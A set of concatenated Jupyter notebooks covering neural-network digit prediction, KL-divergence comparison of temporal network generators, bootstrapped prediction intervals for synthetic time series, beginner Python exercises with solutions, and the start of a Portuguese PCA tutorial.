propagation algorithm to use our weights for prediction.
Our neural network is shown in Figure 2. It has 3 layers: an input layer, a
hidden layer and an output layer. Recall that our inputs are pixel values of
digit images. Since the images are of size 20x20, this gives us 400 input layer
units (excluding the extra bias unit which always outputs +1). As before,
the training data will be loaded into the variables X and y.
A set of pre-trained network parameters ($\Theta_{(1)},\Theta_{(2)}$) are provided and stored in ex3weights.mat. The neural network used contains 25 units in the 2nd layer and 10 output units (corresponding to 10 digit classes).

```
#from scipy.io import loadmat
data = loadmat('ex3weights.mat')
Theta1 = data["Theta1"] # 25x401 np array
Theta2 = data["Theta2"] # 10x26 np array (2d)
print(Theta1.shape, Theta2.shape)
```
### Vectorizing the forward propagation
Matrix dimensions:
$X_wb$: 5000 x 401
$\Theta^{(1)}$: 25 x 401
$\Theta^{(2)}$: 10 x 26
$a^{(2)}$: 5000 x 25 or 5000 x 26 after adding intercept terms
$a^{(3)}$: 5000 x 10
$$a^{(2)} = g(X_{wb}\Theta^{(1)^T})$$
$$a^{(3)} = g(a^{(2)}_{wb}\Theta^{(2)^T})$$
```
def predict(X, Theta1, Theta2):
""" predicts output given network parameters Theta1 and Theta2 in Theta.
The prediction from the neural network will be the label that has the largest output.
"""
a2 = sigmoid(X @ Theta1.T)
# add intercept terms to a2
m, n = a2.shape
a2_wb = np.concatenate((np.ones((m, 1)), a2), axis=1)
a3 = sigmoid(a2_wb @ Theta2.T)
# print(a3[:10, :])
# apply np.argmax to the output matrix to find the predicted label
# for that training sample
# correct for indexing difference between MATLAB and Python
p = np.argmax(a3, axis=1) + 1
p[p==10] = 0
return p # this is a 1d array
# prediction accuracy
pred = predict(X_wb, Theta1, Theta2)
print(pred.shape)
accuracy = np.sum((pred==y).astype(int))/m*100
print('Training accuracy is {:.2f}%'.format(accuracy))
# randomly show 10 images and corresponding results
# randomly select 10 data points to display
rand_indices = np.random.randint(0, 5000, size=10)
sel = X[rand_indices, :]
for i in range(10):
# Display predicted digit
print("Predicted {} for this image: ".format(pred[rand_indices[i]]))
# display image
fig, ax = plt.subplots(figsize=(2, 2))
ax.imshow(sel[i, :].reshape(20, 20).T, cmap=plt.cm.gray, vmin=-1, vmax=1)
ax.axis('off')
plt.show()
```
|
github_jupyter
|
```
import construction as cs
import matplotlib.pyplot as plt
### read font
from matplotlib import font_manager
font_dirs = ['Barlow/']
font_files = font_manager.findSystemFonts(fontpaths=font_dirs)
for font_file in font_files:
font_manager.fontManager.addfont(font_file)
# set font
plt.rcParams['font.family'] = 'Barlow'
import networkx as nx
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
%load_ext autoreload
%autoreload 2
```
# Load generated graphs
```
def load_origin_graph(file_name,gap=299):
data_in = cs.load_data("../Datasets/"+file_name+".dat")
gap = 299
graphs_in = cs.build_graphs(data_in,gap=gap)
return graphs_in
def load_ETNgen_graph(file_name):
path = "../Generated_graphs/Multiple_run/"+file_name+"/"
gap = 299
graphs = []
for i in os.listdir(path):
data_in = cs.load_data(path+i)
graphs_in = cs.build_graphs(data_in,gap=gap)
graphs.append(graphs_in)
return graphs
def load_dym_graph(file_name):
path = "../Competitors_generated_graphs/Dymond/Multiple_run/"+file_name+"/"
gap = 0
graphs = []
for i in os.listdir(path):
print(path+i)
data_in = cs.load_data(path+i)
graphs_in = cs.build_graphs(data_in,gap=gap)
graphs.append(graphs_in)
return graphs
def load_stm_graph(file_name):
path = "../Competitors_generated_graphs/STM/Multiple_run/"+file_name+"/"
gap = 0
graphs = []
for i in os.listdir(path):
print(path+i)
data_in = cs.load_data(path+i)
graphs_in = cs.build_graphs(data_in,gap=gap)
graphs.append(graphs_in)
return graphs
def load_tag_graph(file_name):
path = "../Competitors_generated_graphs/TagGen/Multiple_run/"+file_name+"/"
gap = 0
graphs = []
for i in os.listdir(path):
print(path+i)
data_in = cs.load_data(path+i)
graphs_in = cs.build_graphs(data_in,gap=gap)
graphs.append(graphs_in)
return graphs
import networkx as nx
import numpy as np
from scipy import stats
import matplotlib.pyplot as plt
from topological_metrics import *
import os
```
# Compute and store topological distributions
```
file_name = "High_School11"
orig_graphs = load_origin_graph(file_name,gap=299)
etn_gen = load_ETNgen_graph(file_name)
dym_gen = load_dym_graph(file_name)
tag_gen = load_tag_graph(file_name)
stm_gen = load_stm_graph(file_name)
def comp_metric(graphs,metric):
metric_dist = []
for graph in graphs:
metric_dist.append(metric(graph))
return metric_dist
def compute_store_metrics(metrics,metrics_names,generator,file_name,graphs):
for i in range(len(metrics)):
metric = metrics[i]
metric_name = metrics_names[i]
met = comp_metric(graphs,metric)
np.save("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/"+metric_name,met)
def compute_store_metrics_original(metrics,metrics_names,file_name,graphs):
for i in range(len(metrics)):
metric = metrics[i]
metric_name = metrics_names[i]
met = comp_metric([graphs],metric)
np.save("topology_results/original_distributions/"+file_name+"/"+metric_name,met)
metrics = [density,global_clustering,average_shortest_path,dist_number_of_individuals,
dist_number_of_new_conversations,get_ass,s_metric,dist_frequency_of_interactions,
dist_strength_of_nodes,dist_duration]
metrics_names = ["density","clust","asp","nb_interactions",
"new_con","ass","s_metric","interacting_indiv",
"streng","dur"]
compute_store_metrics_original(metrics,metrics_names,file_name,orig_graphs)
compute_store_metrics(metrics,metrics_names,
"etngen",
file_name,
etn_gen)
compute_store_metrics(metrics,metrics_names,
"taggen",
file_name,
tag_gen)
compute_store_metrics(metrics,metrics_names,
"stmgen",
file_name,
stm_gen)
compute_store_metrics(metrics,metrics_names,
"dymgen",
file_name,
dym_gen)
```
# load distributions
```
labels
def load_topo_distributions(generator,file_name):
den = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/density.npy",allow_pickle=True)
clust = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/clust.npy",allow_pickle=True)
asp = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/asp.npy",allow_pickle=True)
nb_inter = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/nb_interactions.npy",allow_pickle=True)
new_conv = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/new_con.npy",allow_pickle=True)
ass = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/ass.npy",allow_pickle=True)
s_met = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/s_metric.npy",allow_pickle=True)
inter_indiv = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/interacting_indiv.npy",allow_pickle=True)
stren = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/streng.npy",allow_pickle=True)
durat = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/dur.npy",allow_pickle=True)
return asp,ass,clust,stren,durat,s_met,new_conv,inter_indiv,den,nb_inter
def load_topo_original(file_name):
den = np.load("topology_results/original_distributions/"+file_name+"/density.npy",allow_pickle=True)
clust = np.load("topology_results/original_distributions/"+file_name+"/clust.npy",allow_pickle=True)
asp = np.load("topology_results/original_distributions/"+file_name+"/asp.npy",allow_pickle=True)
nb_inter = np.load("topology_results/original_distributions/"+file_name+"/nb_interactions.npy",allow_pickle=True)
new_conv = np.load("topology_results/original_distributions/"+file_name+"/new_con.npy",allow_pickle=True)
ass = np.load("topology_results/original_distributions/"+file_name+"/ass.npy",allow_pickle=True)
s_met = np.load("topology_results/original_distributions/"+file_name+"/s_metric.npy",allow_pickle=True)
inter_indiv = np.load("topology_results/original_distributions/"+file_name+"/interacting_indiv.npy",allow_pickle=True)
stren = np.load("topology_results/original_distributions/"+file_name+"/streng.npy",allow_pickle=True)
durat = np.load("topology_results/original_distributions/"+file_name+"/dur.npy",allow_pickle=True)
return asp,ass,clust,stren,durat,s_met,new_conv,inter_indiv,den,nb_inter
def compute_counts(ro,e):
counts = []
e = np.array(e)
for i in range(len(ro)-1):
r1 = ro[i]
r2 = ro[i+1]
ee = e[e>r1]
count = ee[ee<=r2]
counts.append(len(count))
return counts
def compute_multpile_counts(ranges,ee):
counts = []
for e in ee:
counts.append(compute_counts(ranges,e))
return counts
# example of calculating the kl divergence between two mass functions
from math import log2
# calculate the kl divergence
def kl_divergence_max(d2, d1):
max_len = max(len(d1),len(d2))
new_d1 = np.zeros(max_len)
new_d1[:len(d1)] = d1
new_d2 = np.zeros(max_len)
new_d2[:len(d2)] = d2
E = 0.0000001
new_d1 = new_d1 + E
new_d2 = new_d2 + E
res = 0
for i in range(max_len):
d1 = new_d1[i]
d2 = new_d2[i]
if (d1 != 0) and (d2 != 0):
res = res + (d1 * log2(d1/d2))
return res
```
```
def compute_ks_all_metrics(nb_bins,file_name):
res_etn = []
res_tag = []
res_stm = []
res_dym = []
o_in = load_topo_original(file_name)
e_in = load_topo_distributions("etngen",file_name)
t_in = load_topo_distributions("taggen",file_name)
d_in = load_topo_distributions("dymgen",file_name)
s_in = load_topo_distributions("stmgen",file_name)
all_res = []
for i in range(10):
o = o_in[i]
e = e_in[i]
t = t_in[i]
d = d_in[i]
s = s_in[i]
#if i == 1 or i == 5 or i == 6:
biggest_dist = o[0]
#else:
#biggest_dist = np.max(t)
tc,tranges = np.histogram(biggest_dist,bins=nb_bins)
oc = compute_counts(tranges,o)
ec = compute_multpile_counts(tranges,e)
dc = compute_multpile_counts(tranges,d)
tc = compute_multpile_counts(tranges,t)
sc = compute_multpile_counts(tranges,s)
oc = oc/np.sum(oc)
ec = [np.array(x)/sum(x) for x in ec]
dc = [np.array(x)/sum(x) for x in dc]
tc = [np.array(x)/sum(x) for x in tc]
sc = [np.array(x)/sum(x) for x in sc]
ec_kl = []
tc_kl = []
sc_kl = []
dc_kl = []
for i in ec:
ec_kl.append(kl_divergence_max(i,oc))
for i in tc:
tc_kl.append(kl_divergence_max(i,oc))
for i in dc:
dc_kl.append(kl_divergence_max(i,oc))
for i in sc:
sc_kl.append(kl_divergence_max(i,oc))
maximum_for_nome = max(np.nanmax(ec_kl),np.nanmax(tc_kl),np.nanmax(sc_kl),np.nanmax(dc_kl))
ec_kl = ec_kl/maximum_for_nome
tc_kl = tc_kl/maximum_for_nome
sc_kl = sc_kl/maximum_for_nome
dc_kl = dc_kl/maximum_for_nome
res = [[np.nanmean(ec_kl),np.nanstd(ec_kl)],[np.nanmean(tc_kl),np.nanstd(tc_kl)],
[np.nanmean(sc_kl),np.nanstd(sc_kl)],[np.nanmean(dc_kl),np.nanstd(dc_kl)]]
res_etn.append([np.nanmean(ec_kl),np.nanstd(ec_kl)])
res_tag.append([np.nanmean(tc_kl),np.nanstd(tc_kl)])
res_stm.append([np.nanmean(sc_kl),np.nanstd(sc_kl)])
res_dym.append([np.nanmean(dc_kl),np.nanstd(dc_kl)])
if False:
plt.figure(figsize=(15,5))
plt.subplot(1,5,1)
plt.bar(range(nb_bins),oc)
plt.title("orig")
plt.subplot(1,5,2)
plt.bar(range(nb_bins),ec[0])
plt.title("etn\n"+str(res[0])[0:5])
plt.subplot(1,5,3)
plt.bar(range(nb_bins),tc[0])
plt.title("tag\n"+str(res[1])[0:5])
plt.subplot(1,5,4)
plt.bar(range(nb_bins),sc[0])
plt.title("stm\n"+str(res[2])[0:5])
plt.subplot(1,5,5)
plt.bar(range(nb_bins),dc[0])
plt.title("diam\n"+str(res[3])[0:5])
plt.show()
#res2 = []
#ooo = o[0]/np.sum(o[0])
#eee = e[0]/np.sum(e[0])
#ttt = t[0]/np.sum(t[0])
#sss = s[0]/np.sum(s[0])
#ddd = d[0]/np.sum(d[0])
#res2.append(kl_divergence_max(ooo,eee))
#res2.append(kl_divergence_max(ooo,ttt))
#res2.append(kl_divergence_max(ooo,sss))
#res2.append(kl_divergence_max(ooo,ddd))
#if False:
# plt.figure(figsize=(15,5))
# plt.subplot(1,5,1)
# plt.hist(o[0],bins=10)
# plt.title("orig")
# plt.subplot(1,5,2)
# plt.hist(e[0],bins=10)
# plt.title("etn\n"+str(res2[0])[0:5])
# plt.subplot(1,5,3)
# plt.hist(t[0],bins=10)
# plt.title("tag\n"+str(res2[1])[0:5])
# plt.subplot(1,5,4)
# plt.hist(s[0],bins=10)
# plt.title("stm\n"+str(res2[2])[0:5])
# plt.subplot(1,5,5)
# plt.hist(d[0],bins=10)
# plt.title("diam\n"+str(res2[3])[0:5])
# plt.show()
return [np.array(res_etn),np.array(res_tag),np.array(res_stm),np.array(res_dym)]
ORIGINAL_COLOR = '#474747' #dark grey
ETN_COLOR = '#fb7041' #'#E5865E' # arancio
TAG_COLOR = '#96ccc8' # light blue
STM_COLOR = '#bad1f2' #8F2E27' # rosso
DYM_COLOR = '#559ca6' # teal
line_width = 1.5
idx =[2, 5, 1, 8, 9, 6, 4, 3, 0, 7]
tmp= ["Density",
"Global clustering \ncoefficient",
"Average shortest\npath length",
"Interacting\nindividuals",
"New conversations",
"Assortativity",
"S-metric",
"Number of interactions",
"Edge strength",
"Duration of contacts"]
tmp = np.array(tmp)
labels = tmp[idx]
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
nb_bins = 50
x1,x2,x3,x4 = compute_ks_all_metrics(nb_bins,"LH10")
x = np.arange(10) # the label locations
width = 0.2 # the width of the bars
fig, ax = plt.subplots(1,3,figsize=(12,10))
fig.tight_layout(pad=-4)
error_bar_style = dict(ecolor=ORIGINAL_COLOR, alpha=0.8, lw=1.5, capsize=3, capthick=1)
ax[0].title.set_text("Hospital")
rects1 = ax[0].barh(x + 0.3, x1[:,0], width, xerr=x1[:,1],label='ETN-gen',color=ETN_COLOR, error_kw=error_bar_style)
rects2 = ax[0].barh(x + 0.1, x2[:,0], width, xerr=x2[:,1],label='STM',color=STM_COLOR, error_kw=error_bar_style)
rects3 = ax[0].barh(x - 0.1, x3[:,0], width, xerr=x3[:,1],label='TagGen',color=TAG_COLOR, error_kw=error_bar_style)
rects4 = ax[0].barh(x - 0.3, x4[:,0], width, xerr=x4[:,1],label='Dymond',color=DYM_COLOR,error_kw=error_bar_style)
x1,x2,x3,x4 = compute_ks_all_metrics(nb_bins,"InVS13")
ax[1].title.set_text("Workplace")
rects1 = ax[1].barh(x + 0.3, x1[:,0], width, xerr=x1[:,1],label='ETN-gen',color=ETN_COLOR, error_kw=error_bar_style)
rects2 = ax[1].barh(x + 0.1, x2[:,0], width, xerr=x2[:,1],label='STM',color=STM_COLOR, error_kw=error_bar_style)
rects3 = ax[1].barh(x - 0.1, x3[:,0], width, xerr=x3[:,1],label='TagGen',color=TAG_COLOR, error_kw=error_bar_style)
rects4 = ax[1].barh(x - 0.3, x4[:,0], width, xerr=x4[:,1],label='Dymond',color=DYM_COLOR,error_kw=error_bar_style)
x1,x2,x3,x4 = compute_ks_all_metrics(nb_bins,"High_School11")
ax[2].title.set_text("High school")
rects1 = ax[2].barh(x + 0.3, x1[:,0], width, xerr=x1[:,1],label='ETN-gen',color=ETN_COLOR, error_kw=error_bar_style)
rects2 = ax[2].barh(x + 0.1, x2[:,0], width, xerr=x2[:,1],label='STM',color=STM_COLOR, error_kw=error_bar_style)
rects3 = ax[2].barh(x - 0.1, x3[:,0], width, xerr=x3[:,1],label='TagGen',color=TAG_COLOR, error_kw=error_bar_style)
rects4 = ax[2].barh(x - 0.3, x4[:,0], width, xerr=x4[:,1],label='Dymond',color=DYM_COLOR,error_kw=error_bar_style)
ax[0].set_yticklabels(labels)
ax[0].set_yticks(x)
ax[0].set_xlim(0,1)
ax[1].set_yticks(x)
ax[1].set_yticklabels([" "," "," "," "," "," "," "," "," "," "],rotation=0)
ax[1].set_xlim(0,1)
ax[2].set_yticks(x)
ax[2].set_xlim(0,1)
ax[2].set_yticklabels([" "," "," "," "," "," "," "," "," "," "],rotation=0)
ax[2].set_xticks([0,0.33,0.66,1])
ax[2].set_xticklabels(["0.0","0.33","0.66","1.0"])
ax[1].set_xticks([0,0.33,0.66,1])
ax[1].set_xticklabels(["0.0","0.33","0.66","1.0"])
ax[0].set_xticks([0,0.33,0.66,1])
ax[0].set_xticklabels(["0.0","0.33","0.66","1.0"])
ax[0].tick_params(bottom=True, right=False,left=False)
ax[0].set_axisbelow(True)
ax[0].xaxis.grid(True, color='#b3b3b3')
ax[0].yaxis.grid(False)
ax[1].tick_params(bottom=True, right=False,left=False)
ax[1].set_axisbelow(True)
ax[1].xaxis.grid(True, color='#b3b3b3')
ax[1].yaxis.grid(False)
ax[2].tick_params(bottom=True, right=False,left=False)
ax[2].set_axisbelow(True)
ax[2].xaxis.grid(True, color='#b3b3b3')
ax[2].yaxis.grid(False)
ax[0].spines['top'].set_visible(False)
ax[0].spines['right'].set_visible(False)
ax[0].spines['left'].set_visible(False)
ax[0].spines['bottom'].set_visible(False)
ax[1].spines['top'].set_visible(False)
ax[1].spines['right'].set_visible(False)
ax[1].spines['left'].set_visible(False)
ax[1].spines['bottom'].set_visible(False)
ax[2].spines['top'].set_visible(False)
ax[2].spines['right'].set_visible(False)
ax[2].spines['left'].set_visible(False)
ax[2].spines['bottom'].set_visible(False)
ax[0].legend(loc='upper right',ncol = 5,bbox_to_anchor=(1, -0.05))
fig.tight_layout()
plt.savefig("topology_main_kld_test1.pdf", bbox_inches = 'tight')
plt.show()
```
|
github_jupyter
|
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.ensemble import *
from sklearn.linear_model import *
from sklearn.model_selection import train_test_split, GridSearchCV, cross_val_predict
### UTILITY FUNCTION FOR DATA GENERATION ###
def gen_sinusoidal(timesteps, amp, freq, noise):
X = np.arange(timesteps)
e = np.random.normal(0,noise, (timesteps,))
y = amp*np.sin(X*(2*np.pi/freq))+e
return y
def gen_randomwalk(timesteps, noise):
y = np.random.normal(0,noise, (timesteps,))
return y.cumsum()
### CREATE SYNTHETIC DATA ###
np.random.seed(0)
timesteps = 1000
data1 = gen_sinusoidal(timesteps=timesteps, amp=10, freq=24, noise=5)
data2 = gen_sinusoidal(timesteps=timesteps, amp=10, freq=24*7, noise=5)
data3 = gen_randomwalk(timesteps=timesteps, noise=1)
```
# STATIONARY DATA
```
### STORE DATA IN DF ###
data = data1 + data2
df = pd.DataFrame({
'X1':data1,
'X2':data2,
'Y':data
})
df.index = pd.date_range('2021', periods=timesteps, freq='H')
cols = df.columns
print(df.shape)
df.head()
### PLOT SYNTHETIC DATA ###
plt.figure(figsize=(16,4))
for i,c in enumerate(cols[:-1]):
plt.subplot(1,2,i+1)
df[c].plot(ax=plt.gca(), title=c, color='blue'); plt.xlabel(None)
plt.figure(figsize=(16,4))
df['Y'].plot(title='Y', color='red')
### CREATE ROLLING FEATURES ###
lags = [6, 12, 18, 24]
for l in lags:
for c in cols:
df[f"{c}_mean_t-{l}"] = df[c].rolling(l).mean()
df[f"{c}_std_t-{l}"] = df[c].rolling(l).std()
df['Y'] = df['Y'].shift(-1)
df.drop(cols[cols.str.startswith('X')], axis=1, inplace=True)
df.dropna(inplace=True)
### TRAIN TEST SPLIT ###
X_train, X_test, y_train, y_test = train_test_split(
df.drop('Y', axis=1), df['Y'],
test_size=24*7*2, shuffle=False)
X_train.shape, X_test.shape
### RANDOM FOREST TUNING ###
model = GridSearchCV(estimator=RandomForestRegressor(random_state=33),
param_grid={'max_depth': [8, 10, 12, None], 'n_estimators': [20, 30, 40]},
scoring='neg_mean_squared_error', cv=3, refit=True)
model.fit(X_train, y_train)
model.best_params_
### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###
pred_train = cross_val_predict(RandomForestRegressor(**model.best_params_, random_state=33),
X_train, y_train, cv=3)
res = y_train - pred_train
### PLOT RESIDUAL STATISTICS ###
plt.figure(figsize=(16,5))
plt.subplot(1,2,1)
plt.title('Residuals Distribution')
plt.hist(res, bins=20)
plt.subplot(1,2,2)
plt.title('Residuals Autocorrelation')
plt.plot([res.autocorr(lag=dt) for dt in range(1,200)])
plt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')
plt.ylabel('Autocorrelation'); plt.xlabel('Lags')
plt.show()
### BOOTSTRAPPED INTERVALS ###
alpha = 0.05
bootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])
q_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)
y_pred = pd.Series(model.predict(X_test), index=X_test.index)
y_lower = y_pred + q_bootstrap[0].mean()
y_upper = y_pred + q_bootstrap[1].mean()
### PLOT BOOTSTRAPPED PREDICTION INTERVALS ###
plt.figure(figsize=(10,6))
y_pred.plot(linewidth=3)
y_test.plot(style='.k', alpha=0.5)
plt.fill_between(y_pred.index, y_lower, y_upper, alpha=0.3)
plt.title('RandomForest test predictions')
### HOW MANY OUTLIERS IN TEST DATA ###
((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]
### RIDGE TUNING ###
model = GridSearchCV(estimator=Ridge(), param_grid={'alpha': [3, 5, 10, 20, 50]},
scoring='neg_mean_squared_error', cv=3, refit=True)
model.fit(X_train, y_train)
model.best_params_
### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###
pred_train = cross_val_predict(Ridge(**model.best_params_), X_train, y_train, cv=3)
res = y_train - pred_train
### PLOT RESIDUAL STATISTICS ###
plt.figure(figsize=(16,5))
plt.subplot(1,2,1)
plt.title('Residuals Distribution')
plt.hist(res, bins=20)
plt.subplot(1,2,2)
plt.title('Residuals Autocorrelation')
plt.plot([res.autocorr(lag=dt) for dt in range(1,200)])
plt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')
plt.ylabel('Autocorrelation'); plt.xlabel('Lags')
plt.show()
### BOOTSTRAPPED INTERVALS ###
alpha = 0.05
bootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])
q_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)
y_pred = pd.Series(model.predict(X_test), index=X_test.index)
y_lower = y_pred + q_bootstrap[0].mean()
y_upper = y_pred + q_bootstrap[1].mean()
### PLOT BOOTSTRAPPED PREDICTION INTERVALS ###
plt.figure(figsize=(10,6))
y_pred.plot(linewidth=3)
y_test.plot(style='.k', alpha=0.5)
plt.fill_between(y_pred.index, y_lower, y_upper, alpha=0.3)
plt.title('Ridge test predictions')
### HOW MANY OUTLIERS IN TEST DATA ###
((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]
```
# NOT STATIONARY DATA
```
### STORE DATA IN DF ###
data = data1 + data2 + data3
df = pd.DataFrame({
'X1':data1,
'X2':data2,
'X3':data3,
'Y':data
})
df.index = pd.date_range('2021', periods=timesteps, freq='H')
cols = df.columns
print(df.shape)
df.head()
### PLOT SYNTHETIC DATA ###
plt.figure(figsize=(16,11))
for i,c in enumerate(cols):
color = 'red' if c == 'Y' else 'blue'
plt.subplot(2,2,i+1)
df[c].plot(ax=plt.gca(), title=c, color=color); plt.xlabel(None)
### CREATE ROLLING FEATURES ###
lags = [6, 12, 18, 24]
for l in lags:
for c in cols:
df[f"{c}_mean_t-{l}"] = df[c].rolling(l).mean()
df[f"{c}_std_t-{l}"] = df[c].rolling(l).std()
df['Y'] = df['Y'].shift(-1)
df.drop(cols[cols.str.startswith('X')], axis=1, inplace=True)
df.dropna(inplace=True)
### TRAIN TEST SPLIT ###
X_train, X_test, y_train, y_test = train_test_split(
df.drop('Y', axis=1), df['Y'],
test_size=24*7*2, shuffle=False)
X_train.shape, X_test.shape
### RANDOM FOREST TUNING ###
model = GridSearchCV(estimator=RandomForestRegressor(random_state=33),
param_grid={'max_depth': [8, 10, 12, None], 'n_estimators': [20, 30, 40]},
scoring='neg_mean_squared_error', cv=3, refit=True)
model.fit(X_train, y_train)
model.best_params_
### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###
pred_train = cross_val_predict(RandomForestRegressor(**model.best_params_, random_state=33),
X_train, y_train, cv=3)
res = y_train - pred_train
### PLOT RESIDUAL STATISTICS ###
plt.figure(figsize=(16,5))
plt.subplot(1,2,1)
plt.title('Residuals Distribution')
plt.hist(res, bins=20)
plt.subplot(1,2,2)
plt.title('Residuals Autocorrelation')
plt.plot([res.autocorr(lag=dt) for dt in range(1,200)])
plt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')
plt.ylabel('Autocorrelation'); plt.xlabel('Lags')
plt.show()
### BOOTSTRAPPED INTERVALS ###
alpha = 0.05
bootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])
q_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)
y_pred = model.predict(X_test)
y_lower = y_pred + q_bootstrap[0].mean()
y_upper = y_pred + q_bootstrap[1].mean()
### HOW MANY OUTLIERS IN TEST DATA ###
((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]
### RIDGE TUNING ###
model = GridSearchCV(estimator=Ridge(), param_grid={'alpha': [3, 5, 10, 20, 50]},
scoring='neg_mean_squared_error', cv=3, refit=True)
model.fit(X_train, y_train)
model.best_params_
### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###
pred_train = cross_val_predict(Ridge(**model.best_params_), X_train, y_train, cv=3)
res = y_train - pred_train
### PLOT RESIDUAL STATISTICS ###
plt.figure(figsize=(16,5))
plt.subplot(1,2,1)
plt.title('Residuals Distribution')
plt.hist(res, bins=20)
plt.subplot(1,2,2)
plt.title('Residuals Autocorrelation')
plt.plot([res.autocorr(lag=dt) for dt in range(1,200)])
plt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')
plt.ylabel('Autocorrelation'); plt.xlabel('Lags')
plt.show()
### BOOTSTRAPPED INTERVALS ###
alpha = 0.05
bootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])
q_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)
y_pred = pd.Series(model.predict(X_test), index=X_test.index)
y_lower = y_pred + q_bootstrap[0].mean()
y_upper = y_pred + q_bootstrap[1].mean()
### PLOT BOOTSTRAPPED PREDICTION INTERVALS ###
plt.figure(figsize=(10,6))
y_pred.plot(linewidth=3)
y_test.plot(style='.k', alpha=0.5)
plt.fill_between(y_pred.index, y_lower, y_upper, alpha=0.3)
plt.title('Ridge test predictions')
### HOW MANY OUTLIERS IN TEST DATA ###
((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]
```
|
github_jupyter
|
**Question1**
<br>Create a function that takes three integer arguments (a, b, c) and returns the amount of
integers which are of equal value.
<br>Examples
<br>equal(3, 4, 3) ➞ 2
<br>equal(1, 1, 1) ➞ 3
<br>equal(3, 4, 1) ➞ 0
<br>
<br>Notes
<br>Your function must return 0, 2 or 3.
**Answer:**
```
def equal(a, b, c):
from collections import Counter
temp_dict = dict(Counter([a, b, c]))
temp_list = [temp_dict[i] for i in temp_dict if temp_dict[i]>1]
if len(temp_list) == 0:
return 0
else:
return temp_list[0]
for a, b, c in [(3, 4, 3), (1, 1, 1), (3, 4, 1)]:
print(equal(a, b, c))
```
**Question2**
<br>Write a function that converts a dictionary into a list of keys-values tuples.
<br>Examples
<br>dict_to_list({
<br>"D": 1,
<br>"B": 2,
<br>"C": 3
<br>}) ➞ [("B", 2), ("C", 3), ("D", 1)]
<br>dict_to_list({
<br>"likes": 2,
<br>"dislikes": 3,
<br>"followers": 10
<br>}) ➞ [("dislikes", 3), ("followers", 10), ("likes", 2)]
<br>
<br>Notes
<br>Return the elements in the list in alphabetical order.
**Answer:**
```
def dict_to_list(x):
return sorted(x.items(), key=lambda k: k[0])
for x in [{"D": 1, "B": 2, "C": 3}, {"likes": 2, "dislikes": 3, "followers": 10}]:
print(dict_to_list(x))
```
**Question3**
<br>Write a function that creates a dictionary with each (key, value) pair being the (lower case,
upper case) versions of a letter, respectively.
<br>**Examples**
<br>mapping(["p", "s"]) ➞ { "p": "P", "s": "S" }
<br>mapping(["a", "b", "c"]) ➞ { "a": "A", "b": "B", "c": "C" }
<br>mapping(["a", "v", "y", "z"]) ➞ { "a": "A", "v": "V", "y": "Y", "z": "Z" }
<br>
<br>Notes
<br>All of the letters in the input list will always be lowercase.
**Answer:**
```
def mapping(x):
return {i: i.upper() for i in x}
for x in [["p", "s"], ["a", "b", "c"], ["a", "v", "y", "z"]]:
print(mapping(x))
```
**Question4**
<br>Write a function, that replaces all vowels in a string with a specified vowel.
<br>**Examples**
<br>vow_replace("apples and bananas", "u") ➞ "upplus und bununus"
<br>vow_replace("cheese casserole", "o") ➞ "chooso cossorolo"
<br>vow_replace("stuffed jalapeno poppers", "e") ➞ "steffed jelepene peppers"
<br>
<br>Notes
<br>All words will be lowercase. Y is not considered a vowel.
**Answer:**
```
def vow_replace(x_text, x_vowel):
temp_list = [x_vowel if i in ['a', 'e', 'i', 'o', 'u']
else i for i in list(x_text)]
return ''.join(temp_list)
for x_text, x_vowel in [("apples and bananas", "u"),
("cheese casserole", "o"),
("stuffed jalapeno poppers", "e")]:
print(vow_replace(x_text, x_vowel))
```
**Question5**
<br>Create a function that takes a string as input and capitalizes a letter if its ASCII code is even
and returns its lower case version if its ASCII code is odd.
<br>**Examples**
<br>ascii_capitalize("to be or not to be!") ➞ "To Be oR NoT To Be!"
<br>ascii_capitalize("THE LITTLE MERMAID") ➞ "THe LiTTLe meRmaiD"
<br>ascii_capitalize("Oh what a beautiful morning.") ➞ "oH wHaT a BeauTiFuL
moRNiNg."
**Answer:**
```
def ascii_capitalize(x):
temp_list = [i.upper() if ord(i)%2==0 else i.lower() for i in list(x)]
return ''.join(temp_list)
for x in ["to be or not to be!", "THE LITTLE MERMAID", "Oh what a beautiful morning."]:
print(ascii_capitalize(x))
```
|
github_jupyter
|
# PCA (Principal Component Analysis)
---
<img src="https://selecao.letscode.com.br/favicon.png" width="40px" style="position: absolute; top: 15px; right: 40px; border-radius: 5px;" />
## Introdução
